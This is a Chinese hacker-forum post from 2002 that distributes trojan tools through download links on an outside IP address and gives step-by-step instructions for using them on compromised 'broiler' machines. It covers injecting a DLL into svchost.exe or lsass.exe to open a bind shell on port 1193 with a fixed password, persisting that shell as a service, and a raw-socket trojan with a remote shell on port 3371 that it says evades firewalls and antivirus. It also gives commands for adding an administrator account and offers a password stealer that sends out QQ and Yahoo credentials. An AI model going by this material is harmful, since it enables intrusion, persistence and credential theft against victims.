mf117 
级别:精灵王
威望:0
经验:0
货币:2217
体力:
来源:61.183.64.*
总发帖数:362
注册日期:2002-03-27
|
|
 查看  邮件  主页  QQ  消息  引用  复制  下载
[http://61.183.19.100/dll_new.rar
《兼容性》
注入Dll到exe文件, 实用与win98,win2000,winXP系统。
Shell安装成服务,
实用与win2000,winXP系统。
//////////////////////////////////////////////////////////////////
《使用说明》
假设
a>肉鸡的 Ip 192.168.0.66
b>肉鸡win2000目录为c:\winnt
1. 把 iNetPub.dll 和
dll_in.exe 拷贝 到 “肉鸡”上,
2. 注意: Dll_in.exe 要和 iNetPub.dll 在同一个目录下
3. 要用全路径 (绝对路径)。
4.
Dll_in.exe -exe
c:\winnt\system32\svchost.exe
在系统进程中开一个 shell;
< 端口:1193 密码:abc123>
5.
telnet 192.168.0.66
1193
密码:abc123
6.
你 用fport 可以查看,1193端口 在
svchost.exe下(系统进程中开一个 shell)
7.
Dll_in.exe -exe
c:\winnt\system32\svchost.exe
或
Dll_in.exe -exe
c:\winnt\system32\servers.exe
或
Dll_in.exe -exe
c:\winnt\system32\lsass.exe
或
Dll_in.exe -exe
c:\winnt\system32\calc.exe
或
Dll_in.exe -exe
c:\winnt\system32\telnet.exe
用一个即可。
因为,shell开的端口固定为1193,只有第一个开的shell采起作用。
/////////////////////////////////////////////////////////////////////////////
《修改原理是》
改变svchost.exe他的文件头,如果win2000,winXP没有对关键的文件有恢复机制,
下次win2000,winXP启动,shell仍然起作用,否则下次win2000,winXP启动, shell失效。
win98下永远有效。
///////////////////////////////////////////////////////////////////////////////
《解决win2000,winXP再启动shell失效的方法:》
插入Shell为服务的形式,
a>把shell以服务的形式注入到servers.exe文件中
Dll_in.exe
-install c:\winnt\system32\servers.exe
这样,下次win2000,winXP启动,shell仍然起作用。
用fport 可以查看,1193端口 在
servers.exe下(在系统进程中开了一个 shell)。
b>如果想把shell以服务的形式注入到svchost.exe文件中
<1>先卸载服务
Dll_in.exe -remove
<2>安装注入Shell的服务
Dll_in.exe
-install c:\winnt\system32\svchost.exe
这样,下次win2000,winXP启动,shell仍然起作用。
用fport 可以查看,1193端口 在
svchost.exe下(在系统进程中开了一个 shell)。
[http://61.183.19.100/dll.rar
在系统进程中插入SHELL
假设
a>肉鸡的 Ip 192.168.0.66
b>肉鸡win2000目录为c:\winnt
1. 把 iNetPub.dll 和
dll_in.exe 拷贝 到 “肉鸡”上,
2. 注意: Dll_in.exe 要和 iNetPub.dll 在同一个目录下
3. 要用全路径 (绝对路径)。
4.
Dll_in.exe
c:\winnt\system32\svchost.exe
在系统进程中开一个 shell;
< 端口:1193 密码:abc123>
5.
telnet 192.168.0.66
1193
密码:abc123
6.
你 用fport 可以查看,1193端口 在
svchost.exe下(系统进程中开一个 shell)
7.
Dll_in.exe
c:\winnt\system32\svchost.exe
或
Dll_in.exe
c:\winnt\system32\servers.exe
或
Dll_in.exe
c:\winnt\system32\lsass.exe
或
Dll_in.exe
c:\winnt\system32\calc.exe
或
Dll_in.exe
c:\winnt\system32\telnet.exe
用一个即可。
因为,shell开的端口固定为1193,只有第一个开的shell采起作用。
8.
修改原理是:
改变svchost.exe他的文件头,如果win2000没有对关键的文件有恢复机制,
下次win2000启动,shell仍然起作用,否则下次win2000启动, shell失效。
[http://61.183.19.100/raw.rar
原始套接字木马新版
这是一个基于嗅探原理的原始套接字木马
适用于win2000和XP
该方式的优点:完全基于非连接状态,使用原始包进行
通讯,不同协议有关,可使用任意协议。
作者:mf117
EMAIL:mf117@etang.com
下面是常用的命令的举例说明:
1> 添加一个Admin用户:
net user user6 pass /add
net
localgroup administrators user6 /add
2> 执行一个GUI程序:
calc.exe
3> 执行一个命令行程序:
cmd /c dir c:\ > c:\66.txt
4> 重启计算机:
iisreset/reboot
5> 打开远程SHELL:
start_shell
说明:以上的命令只有 5> 打开远程SHELL 是我的
程序提供的功能,端口号是:3371
你可以 telnet ip 3371 来控制对方计算机。密码:abc123
每次只允许一个用户联结,exit命令退出并关闭SHELL。
发现BUG请给我来信: mf117@etang.com
http://61.183.19.100/raw_muma.rar
原始套接字木马
raw_c.exe 为客户端,raw_s.exe为服务端。
该木马优点:完全基于非连接状态,使用原始包进行通讯,不同协议有关,可实现部分的隐藏地址(如果是非交换的局域网则是可以完全的隐藏地址)、可实现无连接反向通讯、甚至能够突破一些防火墙的监视。
安装简单,raw_s.exe直接运行即可,我做了实验,可以通过天网,金山毒霸,等放火墙。
我采用
服务+注册表双重隐藏raw_s.exe,用于知道的固定IP的计算机上安装此木马。
http://61.183.19.100/mail_new.rar
在命令行下:
1> kp -install -->安装成服务,每次为自启动 (对
win200、win XP 有效)
2> kp -method2 -->在 /RUN 下使他为自启动 (对
win98、win200、win XP 有效)
3> kp -->安装成服务和在 /RUN 下使他为自启动
如:QQ 、宽带 Enterner上网、www.yahoo.com.cn、的密码都可以发送。
[ 此消息由 mf117 在 2002-12-05.18:59:24 编辑过
] |
首页 
小榕软件实验室 
刀光雪影 
注入式木马 
将此页发给您的朋友
编辑
删除
发表于 2002-12-05.18:58:42 
IP: 
.gif)
.gif)
